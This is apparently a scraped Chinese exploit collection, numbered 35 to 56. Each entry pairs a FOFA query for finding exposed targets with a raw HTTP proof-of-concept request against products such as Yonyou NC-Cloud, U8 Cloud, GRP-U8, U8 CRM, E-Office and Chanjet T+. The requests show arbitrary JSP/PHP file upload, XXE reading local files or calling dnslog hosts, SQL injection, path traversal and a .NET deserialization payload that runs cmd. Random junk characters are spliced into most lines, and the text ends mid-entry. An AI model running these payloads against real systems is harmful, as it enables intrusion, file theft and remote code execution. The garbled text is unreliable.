# X1 g m- P7 S% [) E35. 用友NC-Cloud importhttpscer任意文件上传. q& ` ?. L4 _! ^$ E. D1 n
FOFA:app="用友-NC-Cloud"
* |' f! p) P& O( q$ H+ P2 @POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1$ f# q1 G' _) D* W2 p7 ?$ T
Host: 203.25.218.166:8888. c1 Q& I5 J7 L' R1 B1 L5 D
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info, j( r$ C" T- ]
Accept-Encoding: gzip, deflate5 q' [3 g( A2 p( V- @
Accept: */*
, }& c3 n) G" V- V; s) E" Y, GConnection: close
# ~, f" B+ b4 l1 A8 j% MaccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
, |: t4 n% E2 Z( b# TContent-Length: 190
5 H2 Y- A( N$ h: d8 {. gContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df03 J/ Y( G, G) A" g6 N
! M. o! r. y& Q. c, z" _' V--fd28cb44e829ed1c197ec3bc71748df0( ~+ r0 \1 j' g; |
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
5 t0 G( t" ]( q9 I, n" h$ Y5 g6 d* O/ Z5 ]- B0 i
<%out.println(1111*1111);%>. m8 a- N# m% v4 {, ^, f- b$ ]2 }
--fd28cb44e829ed1c197ec3bc71748df0--
! j% r4 I4 ]( e4 i! o/ I2 P* ]8 G$ `. [ ~6 w( L1 y0 r( g3 W
% l; u6 K$ b6 |4 O6 x$ g36. 用友NC-Cloud soapFormat XXE0 |& k. q- E% U6 H
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/" d- u7 e$ R- }; d
POST /uapws/soapFormat.ajax HTTP/1.1) N9 [# O+ P: R. ?% F9 d6 m0 Y
Host: 192.168.40.130:8989$ h d. K6 ~0 K6 F( J9 \ _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.09 Z1 m. E {+ }, m" T
Content-Length: 263# s, T2 }% m% g0 k$ W+ s' X2 |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
$ `, J" G5 O, F* H- {# nAccept-Encoding: gzip, deflate
8 s; d: g k) p; w" x, m% [3 LAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) E. g: i# H1 W8 ~! U# v
Connection: close
* ~' a5 \6 B+ A7 pContent-Type: application/x-www-form-urlencoded/ ?% u, c9 @5 `. I0 l2 G8 w+ {# O
Upgrade-Insecure-Requests: 1
, y+ a1 j$ g/ t8 w2 M5 a' g
% Q9 ^; N2 L' [msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
/ m0 v: B! J7 z6 [
/ O4 Q, x8 a8 Q5 f- u+ Y( }. z6 c, X ~, q5 G& M9 v& A
37. 用友NC-Cloud IUpdateService XXE7 S/ _' O& L+ o _8 t
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"7 J2 G3 @+ e9 g( S- X/ z3 C! v& [
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
- s, ?4 K) W* Q! b: zHost: 192.168.40.130:8989
/ v; w7 ^# t# D: ^( @5 l) n# _. ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
1 z6 T4 ^7 A# T. p) @) NContent-Length: 4212 {; V/ A5 A3 c5 T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
6 g5 @! \: D5 \Accept-Encoding: gzip, deflate% n) m. P' Y. o$ q6 q8 U
Accept-Language: zh-CN,zh;q=0.91 ]) D( x7 w5 V0 i3 O- n; g
Connection: close8 U5 y5 {* _2 X$ R* i
Content-Type: text/xml;charset=UTF-8
( z5 ?9 Q. j. [, W0 D# A9 FSOAPAction: urn:getResult
; w' M2 L$ C( m7 w" I n$ h7 SUpgrade-Insecure-Requests: 15 p K0 p, e, e4 ?
( q9 r& ]& G3 f0 c3 y/ V6 k }) \0 @
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">) Y7 b( y0 X: x* i6 C2 y
<soapenv:Header/>
- b- b: E$ Z% a3 c% g8 z1 z<soapenv:Body>$ f% A( {+ n" c& y% b: n
<iup:getResult>" v# W# C8 o5 d+ C G! G
<!--type: string-->5 H: I, o5 D- Y, m: Q
<iup:string><![CDATA[
6 u, x5 _4 o+ ?<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>- H9 a: a6 R" b4 L7 z; {; ]: _. J
<xxx/>]]></iup:string>2 {# m+ B$ l8 b+ g
</iup:getResult>
/ j4 P& I5 G; a</soapenv:Body>
7 y/ w' X) G2 V$ |5 R5 J</soapenv:Envelope>3 A' } U& I. s2 l2 J# x! z2 l
3 n4 s$ O7 T; Z B4 q4 Y3 y
% O5 M/ g4 v6 y
% A( B2 c4 k& _7 a8 a38. 用友U8 Cloud smartweb2.RPC.d XXE0 @0 L0 O; X* C \4 @; {) J" w
FOFA:app="用友-U8-Cloud"+ e" r, S% n! B+ Z( I+ m
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
7 g' K4 M" x+ B, eHost: 192.168.40.131:8088& M1 `. N2 h1 v. r4 U& k) n8 D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25, B5 g1 @5 l2 f$ U: R9 ?0 L$ R
Content-Length: 260
* Q& s: [8 `7 F' H- ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3. t3 n; A4 P2 W6 M$ ?* a
Accept-Encoding: gzip, deflate
: z% _7 z _) u* c" a" i4 VAccept-Language: zh-CN,zh;q=0.9
/ t7 G4 X" ?+ o/ |% @Connection: close9 a1 l9 o" v- J# s5 E' e3 \0 u; C$ c
Content-Type: application/x-www-form-urlencoded u* b9 \9 i( H! E6 U f1 i& r3 d0 E
: l' B0 E. m: c4 ]0 ^# ]
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
' i" [/ M* @/ t& e5 A2 z7 D, S0 F, T2 L; ?: k8 P }; y% v4 t
j/ V. ^) T, o
39. 用友U8 Cloud RegisterServlet SQL注入
" m9 f ~7 v* w- l1 ]FOFA:title="u8c"! t) R/ o0 e& ~6 d7 S0 s% `
POST /servlet/RegisterServlet HTTP/1.1
& C8 q/ m& d" `7 U* ^! O i' fHost: 192.168.86.128:8089
. i/ B @6 B S( M2 j G1 W9 pUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36- X* q: \* q8 k0 h) |7 m+ _* `
Connection: close9 W, w) ]2 N. H7 D. l4 r' y
Content-Length: 85
* g% [* h; r) O$ X- n' jAccept: */*; Z/ h0 g6 e" H0 }
Accept-Language: en& \, B" E& {1 X1 o: d
Content-Type: application/x-www-form-urlencoded3 K* Z1 y- g# d$ }- d! Q' T5 e7 D% ^+ a
X-Forwarded-For: 127.0.0.1
/ X$ {" Z Y" j pAccept-Encoding: gzip
0 J/ f% z( i- Q! O/ p4 ~5 m7 s" N
( _- t8 R& S" K* t: Busercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--% a" w. f8 n# e1 |* H# Q w* c8 X! V) U
( |# g9 [# |0 U$ ^
9 ?7 W$ r) w- A6 k9 h' n! Z9 f40. 用友U8-Cloud XChangeServlet XXE$ a; l6 G X! o$ } d- t
FOFA:app="用友-U8-Cloud"
6 |1 i0 S( q1 J1 t/ f) l$ Y mPOST /service/XChangeServlet HTTP/1.11 \" f4 P1 r6 j: i) D% A
Host: x.x.x.x
# C2 U& k- j! _% t/ G$ c8 s& p9 \User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
7 g- u. M/ V+ w+ ^% A+ eContent-Type: text/xml, G: i* z3 I. K5 X* H) K9 m
Connection: close
u. M/ ?4 J8 \$ r( h: c9 [
9 i' Q, K# d4 W$ P# J( t6 K: Z( ~<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>+ q7 T) P c! ?; F* @- f T7 b2 p9 {' O
- ^, d" n7 v& Q q0 r
x" _# R3 R- ]; F! B41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
& A6 R" B( C) H, ~9 `9 JFOFA:app="用友-U8-Cloud"
) X& p: M: c+ p5 X: H- f. V# }3 TGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.18 y1 p! \6 X: u! d' \
Host:& N2 \7 C: K2 b- J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.151 R$ p) F- J7 s7 R: W5 B9 [
Content-Type: application/json
. R+ V- D. m8 E4 |: PAccept-Encoding: gzip
8 r. M7 S) B& d, h" z7 fConnection: close6 u/ l& k3 E8 S! a
% S' E; z/ t% Y) ?
3 G0 y' F2 ~6 a% f; N7 r1 ?& d42. 用友GRP-U8 SmartUpload01 文件上传
8 j, k/ Z# ~+ UFOFA:app="用友-GRP-U8"
3 w' P J; f3 P. X' ^ P+ x) VPOST /u8qx/SmartUpload01.jsp HTTP/1.1
! G C( s& O4 K$ O8 V$ k+ [Host: x.x.x.x& E9 s# v2 a8 D {6 t# U7 L2 c
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
6 N5 h" d0 q8 v5 W+ v* O. K3 f' F4 H% PUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.360 s0 D/ v n& }- @. h9 z. p& B
* C8 l/ B3 z. }2 ~PAYLOAD
/ p: \+ v/ C: J, `5 D1 P" j: M* X( q5 |4 m7 E& ^& a& H8 k
: v0 c! u8 q3 V' G
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
# {9 a7 X& G' C
) N' [5 x4 N* _) K9 z43. 用友GRP-U8 userInfoWeb SQL注入致RCE
; }$ v. O3 ?$ }; Z$ P+ |( v- GFOFA:app="用友-GRP-U8"% T% h- ^3 h! L
POST /services/userInfoWeb HTTP/1.1
5 E6 Q$ d% g. n7 OHost: your-ip) U# d6 _" M- I6 L1 `
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
. d# F7 \5 F5 Y( n& mAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.78 x- N# e" s+ G D5 S
Accept-Encoding: gzip, deflate
( v" g `5 M( P6 x7 q6 WAccept-Language: zh-CN,zh;q=0.9
. [' \: o5 X) R5 C$ YConnection: close
( S! v7 _& b- W2 J" ^SOAPAction:
$ c2 |9 K! L( J, D. h: D- u5 zContent-Type: text/xml;charset=UTF-81 s0 ~# e7 U+ H+ B; Y
V& B" Q- @3 [3 M<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">/ u p- q2 [9 ?! e1 M9 m7 |
<soapenv:Header/>9 Z9 {: L% l p$ t
<soapenv:Body>
0 d. `9 l1 b4 |. S <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
" m# d t/ [2 x, J7 Y <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
- P4 N- |' A6 \ </ser:getUserNameById>
. C% \; `) v. }# e \0 I' @; R* i& [ </soapenv:Body>( P7 W# N% T3 f9 E. B% x/ W$ K3 c9 E
</soapenv:Envelope>
& L% a0 M6 z3 @, T+ E9 D
7 o- ]; t* T! R0 _3 f- r
4 U/ ]- u% A7 W# w44. 用友GRP-U8 bx_dj_check.jsp SQL注入 J/ w' @/ j& p/ i$ E( R
FOFA:app="用友-GRP-U8"( L* w' B8 s0 |& X9 y
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
' n U' ]- p, A% [6 ^% t( r2 }Host: your-ip# E7 g# u* `$ e4 s* Z; P
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.367 u6 Z% ]! [ B( A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.73 S! J0 G- K' ?2 I( d
Accept-Encoding: gzip, deflate0 C* o8 |' t1 Y& ?; D/ J/ y8 X
Accept-Language: zh-CN,zh;q=0.9
1 J' j( N9 ]( x1 o4 H* a& i. @$ ?Connection: close8 { V+ k: V' |2 Z4 D% E. k
( U+ d4 K% n: _% N( r" D; e1 M; Y: D3 w+ l6 m+ @3 }
45. 用友GRP-U8 ufgovbank XXE
+ ^6 B, Y% S" _% WFOFA:app="用友-GRP-U8"$ ~9 x/ J- V+ R! n6 `; i
POST /ufgovbank HTTP/1.1# g0 l8 u1 s( C7 {. P% c8 q. L
Host: 192.168.40.130:222. ~* ~' F T; c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
3 T8 \$ _8 v' a) h7 c- S- SConnection: close. C( p2 |/ Y0 V2 ]
Content-Length: 161
7 Z( t0 f3 ^8 V2 F" J8 NAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
( i |9 |& i6 t: OAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. g/ B0 b; z" u" D2 j: N3 J9 d
Content-Type: application/x-www-form-urlencoded
3 A5 p; D; S% n- W* f8 T6 pAccept-Encoding: gzip
8 ^6 N6 l- l, c8 Y
: O( a w% `, v& ^. oreqData=<?xml version="1.0"?> A) t$ \0 _8 m
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
3 {, \& t, Q6 f
0 X$ H3 D5 k0 i
. H/ ]- Z" W( C9 u! R6 v' e2 s46. 用友GRP-U8 sqcxIndex.jsp SQL注入: d/ I5 _! `- v! t: F- R
FOFA:app="用友-GRP-U8"6 r- w( T) U7 J+ Z. b3 l, Z: B- B( Q
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1" `" D$ x" E- Q9 {
Host: your-ip+ b) i1 P3 k! {, f) H1 Q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
/ l% u7 d7 ^1 y" _3 \Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7& l% S7 }2 e P
Accept-Encoding: gzip, deflate6 C$ G7 N; J8 Y) l
Accept-Language: zh-CN,zh;q=0.9
7 V8 Y% o6 K: K3 j0 _0 bConnection: close- E$ g8 g- m, d o, }$ \6 L
3 t2 x5 N6 m) n! y8 k# k5 O/ D* e7 K1 y
47. 用友GRP A++Cloud 政府财务云 任意文件读取
# @0 z2 \' H) E$ O, r# E/ zFOFA:body="/pf/portal/login/css/fonts/style.css"5 M) D" j) |4 N/ L
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
( A+ u; R# Q& |; W3 EHost: x.x.x.x
* C$ f# ]# G$ E8 {. C+ \: ], ]5 eCache-Control: max-age=08 g9 H+ \2 t. S- ]* J1 s5 Z5 f; G
Upgrade-Insecure-Requests: 19 F4 `, n- E( e7 U' A8 |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" p K) v: ]/ W
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ Z4 V* K/ u+ O& u5 g
Accept-Encoding: gzip, deflate, br! U! _0 o/ k( l0 N5 J6 U( T
Accept-Language: zh-CN,zh;q=0.9
+ x) _+ \5 e8 x: r1 l; y3 r4 A2 PIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT) F: y4 c2 A/ {, ~5 K5 {0 P
Connection: close% P3 v" ?4 L3 t
* J1 T, l* O q6 R" E' y
2 d' q6 W- P8 Q+ {! m$ \
( w" l; a5 a6 w* s: Q48. 用友U8 CRM swfupload 任意文件上传
: n3 e3 a1 c4 ?FOFA:title="用友U8CRM"
9 m4 W% \' q! u1 Y- [. W0 p: l; \POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
4 ], `. q: j: v/ z) ^Host: your-ip
) e" M& [ m, P! [. h6 F, M! zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
7 O. U$ A" g9 EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8$ Z6 K6 ~( e( F3 }( p# k
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 T1 X& K& |6 v- E9 MAccept-Encoding: gzip, deflate1 {, ~& @3 a% I" h
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
9 a6 G& W! m. e' W V0 B) u4 \* v' ]------2695209672394068716424300668553 _ x9 u! _* W/ P4 r/ Z
Content-Disposition: form-data; name="file"; filename="s.php"2 j; B! z: ^" G. o! {" D% p
1231/ n0 M! R' O( Z* k9 Z1 _
Content-Type: application/octet-stream2 J0 h" S! L9 M7 a- ] X, } w+ }( L9 C
------269520967239406871642430066855
, |7 W* K; g7 n6 A F kContent-Disposition: form-data; name="upload"
+ A6 {' M; ]7 |# |upload
3 y0 c6 y( Q3 r------269520967239406871642430066855--- H/ G; @- H6 B0 F6 c z1 \
! _1 x: J$ I" N% _6 [
& Z7 P' b9 b4 T8 O0 c' K4 |
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
0 }6 \; b9 g7 |# C% y$ L" m0 y4 }FOFA:body="用友U8CRM"
- Z4 n6 \4 e5 y1 _: g
& k, c, Q. z; [6 K& |! V TPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
; ^& b5 S6 O4 Z" ]( b+ Z/ CHost: x.x.x.x
$ X1 r" E. Y; _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0) }( ^- | M0 a2 Q' G$ J$ |6 d
Content-Length: 329
& X P( R* l; ~+ k; bAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ e" }5 V2 _ ~% f1 `( c" lAccept-Encoding: gzip, deflate. W0 r' h6 m; O* h; {4 L
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- [! |4 H. T! I2 }
Connection: close
* W) j1 o* E3 XContent-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
- R0 H2 x. m& Y* h& |* f/ \1 ~# V4 b2 b& |' D
-----------------------------vvv3wdayqv3yppdxvn3w
6 j+ E) T: }; p( nContent-Disposition: form-data; name="file"; filename="%s.php "
# P3 b0 ^( f2 RContent-Type: application/octet-stream
, x/ b1 {4 z A# m5 T8 ^2 X7 h0 l/ K( j
wersqqmlumloqa% D0 q& w* |) p
-----------------------------vvv3wdayqv3yppdxvn3w1 k2 I" B2 I1 m9 E/ _
Content-Disposition: form-data; name="upload"
- q1 ~0 b$ b# a' D8 R7 L. D- o$ x2 C; W
upload& G% H- l- U4 r3 |& v9 H
-----------------------------vvv3wdayqv3yppdxvn3w--* T: A3 X/ K0 X- t
* {0 w: q: d; p1 H) Y1 t9 K1 Q3 n$ m3 B
http://x.x.x.x/tmpfile/updB3CB.tmp.php) I9 \6 d# I! X" K& `1 U- Z
% w: j ~- N2 L4 o- m" D2 `50. QDocs Smart School 6.4.1 filterRecords SQL注入+ z3 _# R% t6 O- z: X+ f+ |4 l
FOFA:body="close closebtnmodal"
8 \, g, }3 l4 I4 \5 v( CPOST /course/filterRecords/ HTTP/1.1# z, s# X5 z6 ^4 f
Host: x.x.x.x
7 F' r) `6 c% o A$ G3 CUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 m, Y: f6 H- M9 W
Connection: close
! z2 K6 q4 @, z# `+ c e& ^0 t& xContent-Length: 224
4 x: I+ x5 r1 \& {, k% x" V3 fAccept: */*& A* A0 D2 T. X0 @
Accept-Language: en
# V, ]2 U1 Z2 p$ Q, _, |$ wContent-Type: application/x-www-form-urlencoded5 p' y! \, g* a
Accept-Encoding: gzip- P V" d' ~' w. n$ k
; h! C, T1 E* Q1 {; msearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
/ P/ ?7 M' e2 w( c8 t
% {/ t0 X: B# n( [; T) ~4 Z* U. [- I* B/ X
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
; C+ u# Q, i! q. V; T+ y6 zFOFA:app="云时空社会化商业ERP系统"6 w- T& q# Y# t1 y$ v% a: q
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1: [8 ]* p0 Z; D& X+ A# g
Host: your-ip
; O0 @- W+ `5 XUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
- z2 n- p/ n- m' S& M6 GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.90 P- ]% v: Q/ u9 o
Accept-Encoding: gzip, deflate
4 l1 |8 M/ [1 G/ g2 F" gAccept-Language: zh-CN,zh;q=0.92 E& ?' j. I$ U4 \. l0 ?
Connection: close1 Z9 `$ ~1 N. p! ~; a
4 R3 d! }4 { @: e3 h
6 K0 ]* ^' n8 A. K52. 泛微E-Office json_common.php sql注入
/ S4 ?$ X' N( |# Z$ k; n& s/ NFOFA:app="泛微-EOffice"
3 A2 q: S+ A6 x6 r# q: N/ \POST /building/json_common.php HTTP/1.14 K9 {- M8 Z! \" T) B! @, g
Host: 192.168.86.128:80974 b8 B4 |$ {' i, O- ~5 `
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36" e2 I# `/ Y2 Y* m
Connection: close! T/ U. _& B4 R3 W3 x
Content-Length: 87( U7 k% m. C: |5 X) |- }" G
Accept: */*
& X( D, g( `/ O; R8 }$ k3 BAccept-Language: en
o# D, ~, ]% U4 fContent-Type: application/x-www-form-urlencoded2 K% \7 s$ B9 ]; K: p$ {& G
Accept-Encoding: gzip
8 Q0 i1 a$ R/ t8 C5 B: X
0 o9 }* `" s, z, X- C3 n' ?9 U, ]0 `tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|3332 H0 u3 b* x, \
3 W6 i' ^! g& [/ i7 _) _8 U+ F) H: V( {4 s# K
53. 迪普 DPTech VPN Service 任意文件上传
7 B) G# A8 ^1 A/ j$ ^* W# vFOFA:app="DPtech-SSLVPN"
6 u5 Q/ V8 p- B0 W/ B3 Z7 ^0 Z6 u/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd7 x& v# W% s7 t2 [
& q2 C7 q# e2 X+ i
- y/ i8 C+ S7 A: c+ C54. 畅捷通T+ getstorewarehousebystore 远程代码执行1 t$ P9 z* ~& N
FOFA:app="畅捷通-TPlus"/ B# ]; l, m' O) W
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
9 V/ `8 R% g* d"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
& I Y2 ]. ^3 I# g5 [
) Z3 h% f: o& F1 ]& j
% x# ~: {6 q" V7 h完整数据包. h4 b# Q0 ^5 T' O6 R
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
5 b$ j0 {9 q. x) ~# o5 LHost: x.x.x.x- |1 D# H; Q) ]* X. ` |
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F( h0 O( d. Q7 }$ D
Content-Length: 593
' `" t% t' u7 d m9 P) @. [0 c* V. [" Y+ x+ `
{
& ~8 a( F: H0 x- Z7 n- Y' g, k6 M"storeID":{9 W4 t) ?) \9 ^: D4 A
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",3 u$ T/ K k$ |8 X& D ]2 B" {
"MethodName":"Start",
$ C( t4 |1 _! b9 `4 v' V "ObjectInstance":{
9 _% F" v# q& c1 P "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",4 K A# |0 B' v5 P. M( e( I! u
"StartInfo":{
y8 P) h h' \( }/ s! K "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
. b3 I- N% T0 h9 m "FileName":"cmd",! X1 b+ x- Z. N% H; @( B
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"% m f1 c$ S8 M) L
}
' K; R8 d% f/ }& r }
4 F8 k: i" h- Y }" Q4 f* P+ t5 M; w+ i
}; A4 y$ F) i1 p" l3 x( v' x
' ~) u# H" X% ^: O
) V" s; o6 `+ O9 n }! V第二步,访问如下url- U: D/ i( g. o7 e1 _( B
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
3 q6 h8 F7 [0 E1 V1 @* Y# O; [& @8 N
m) g# |% ?! i# L
+ h7 f! n; ?5 ~55. 畅捷通T+ getdecallusers信息泄露" d" L5 Z2 n5 n
FOFA:app="畅捷通-TPlus"
. U3 g( U, p4 ]( p' M5 F第一步,通过+ h) R$ Z, P! V/ M( u
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie3 @3 N0 [4 ~; [- ~
第二步,利用获取到的Cookie请求
) s& \$ e) j6 j0 C4 A0 F" \/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers! Q3 h" H6 t9 o: w3 x
+ o h& \4 Y3 |' k
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
$ \. f3 G Q" n) Y3 QFOFA: app="畅捷通-TPlus"
. Q F, K! g/ JPOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
